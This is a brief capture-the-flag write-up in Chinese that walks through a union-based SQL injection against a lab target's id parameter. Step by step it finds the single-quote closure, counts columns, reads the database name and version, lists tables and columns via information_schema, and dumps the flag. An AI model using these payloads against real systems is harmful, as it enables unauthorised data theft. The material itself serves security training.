啟動靶機
很明顯注入點為id值,單引號閉合影響語句,說明為單引號閉合
構造注入語句 ?id=1 ' and 1 =1 --+ 發現沒報錯,說明沒有其他過濾 ,開始sql注入
?id=1 ' order by 4 --+ 直到=4報錯說明有3個位元組段
測試回顯位2,3 ?id=1 ' and 1 = 2 union select 1,2,3 --+
測試當前資料庫名note,版本MariaDB-1ubuntu0.14.04.1 ?id=1 ' and 1 = 2 union select 1,database(),version() --+
獲得表名 fl4g,notes ?id=1 ' and 1 = 2 union select 1,2,group_concat(table_name) from information_schema.tables where table_schema ='note' --+
繼續獲得列名fllllag ?id=1 ' and 1 = 2 union select 1,2,group_concat(column_name) from information_schema.columns where table_schema ='note' and table_name='fl4g' --+
查詢表獲得flag n1book{union_select_is_so_cool} ?id=1 ' and 1 = 2 union select 1,2,group_concat(fllllag) from fl4g--+
